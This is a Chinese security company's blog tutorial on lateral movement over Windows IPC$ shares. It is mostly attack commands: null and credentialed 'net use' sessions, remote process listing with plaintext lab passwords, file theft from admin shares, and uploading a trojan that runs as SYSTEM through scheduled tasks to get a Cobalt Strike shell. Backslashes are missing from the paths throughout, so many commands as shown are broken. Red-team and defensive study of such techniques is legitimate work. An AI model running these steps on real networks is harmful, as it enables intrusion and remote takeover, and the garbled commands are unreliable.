你好,欢迎进入润成安全技术有限公司官网!

润成安全技术有限公司

Yunch Security Technology CO.,LTD

022-83698697

当前位置: 首页>新闻中心>技术干货

技术干货 | IPC$横向移动

发布时间:2024-04-09

浏览次数:402
















IPC$(Internet Process Connection)是共享命名管道的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可建立安全通道,并以此通道进行加密数据的交换,从而实现对远程计算机的访问。
利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(对方机器必须开了ipc$共享,否则是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。需要注意的是,如果是利用空连接,所获得的权限也是空权限,所以最理想的情况为ipc管理员空密码连接。



















01

使用条件

















(1) 139、445端口开启:ipc$连接可以实现远程登陆及对默认共享的访问,而139端口的开启表示netbios协议的应用,通139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的。

(2) 管理员开启了默认共享:默认共享是为了方便管理员远程管理而默认开启的共享,即所有的逻辑盘(c$,d$,e$……)和系统目录wi nnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问

(3)获取了目标的账户密码,或者发现是ipc空连接、管理员空密码等情况

















02
常用命令

1)建立连接

建立一个空连接


net use IPipc$ "" /user:""(一定要注意:这一行命令中包含了3个空格)


建立一个非空连接

net use IPipc$ "密码" /user:"用户名" (同样有3个空格)


查看当前ipc连接

net use

删除ipc连接

net use IPipc$ /del


2)查看目标系统信息

查看目标系统时间

net time 192.168.52.138


查看目标进程

tasklist /S 192.168.52.138 /U redteamadministrator /P Admin12345!
/S : 指定连接到的计算机或IP地址,默认本机
/u []: 指定使⽤哪个⽤户执⾏这个命令
/P [password] : 为指定的⽤户指定密码。


查看目标的共享磁盘

net view IP


3)文件操作

映射目标共享磁盘

net use z: IPc$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令如下
net use z: IPc$


删除共享映射

net use z: /del 删除映射的z盘,其他盘类推


查看目标ipc系统目录

例如查看目标c盘目录
dir IPc$


查看目标系统文件

type IPc$pass.txt


上传文件

copy E:payload.txt 192.168.52.138c$

copy 要上传的⽂件名 IPc$

下载文件

copy IPc$123.txt E:
将文件下载到E盘


4)计划任务

schtasks执行计划任务

schtasks在 Windows 2008 及之后使用
在目标主机win_server2008(10.10.10.8) 中创建⼀个计划任务名为 test,并且以 system 身份每分钟运行⼀次1.txt
1、创建计划任务
schtasks /create /tn test /U redteamsaul /P admin!@#45 /tr "c:1.txt" /sc MINUTE /mo 1 /s 10.10.10.8 /RU system
执行该任务
2、执⾏计划任务
schtasks /run /tn test /s 10.10.10.8 /U redteamsaul /P admin!@#45
3、删除计划任务
schtasks /F /delete /tn test /s 10.10.10.8 /U redteamsaul /P admin!@#45


AT执行计划任务

在老版本的系统中,可以AT命令来设置计划任务
at IP 5:20PM C:calc.bat
让目标机器在下午 5:20 分运行 calc.bat:


at IP 2:25PM cmd.exe /c "ipconfig >C:/3.txt"
或者可以利用at执行系统命令

删除at计划任务
at IP ID /delete


03
横向getshell
假设我们此时获取到了一个ipc连接,下面演示如何拿到一个shell
首先ipc连接
查看对方系统时间
将准备好的木马上传到目标系统内
copy E:123.exe 192.168.52.138c$

查看一下目标c盘文件,是否成功上传
dir 192.168.52.138C$

成功上传后,根据目标的系统版本设置计划任务执行该文件
1.创建任务
schtasks /create /tn shell /U administrator /P hongrisec@2019 /tr "c:123.exe" /sc MINUTE /mo 1 /s 192.168.52.138 /RU system

2、执⾏计划任务
schtasks /run /tn shell /s 192.168.52.138 /U administrator /P hongrisec@2019

若cs已经接收到了shell,由于计划任务还在执行,所以需要删掉
3、删除计划任务
schtasks /F /delete /tn shell/s192.168.52.138/Uadministrator/P hongrisec@2019

以上便是ipc内网横向的操作思路,更多网络安全资讯,请关注润成安全。





   润成安全技术有限公司(简称“润成安全”,英文缩写“YUNCH SECURITY”),是经公安部批准成立的网络安全等级测评与检测评估机构,证书号码:SC202127130010048。
     润成安全聚集了中国网络安全界的开拓者和一批高素质的技术专家,积极引进和转化世界先进的实践经验和技术成果。凭借雄厚的技术资源以及可持续发展专业背景,与相关行业主管部门紧密合作,构建了等保测评服务、通保测评服务、车联网测评服务、APP测评服务、数据安全评估服务、渗透测试服务、漏洞扫描服务、安全监测服务、安全应急服务、信息安全风险评估服务等十大业务板块,服务客户涵盖政府机关、交通、金融、电力、医疗、教育、互联网及能源等多个行业,在北京、上海、天津、河南、湖南等多地提供优质完备的网络安全服务和解决方案。
官方互动联络邮箱:runchenganquan@yunch.com.cn
联系电话:022-83698697


022-83698697

微信二维码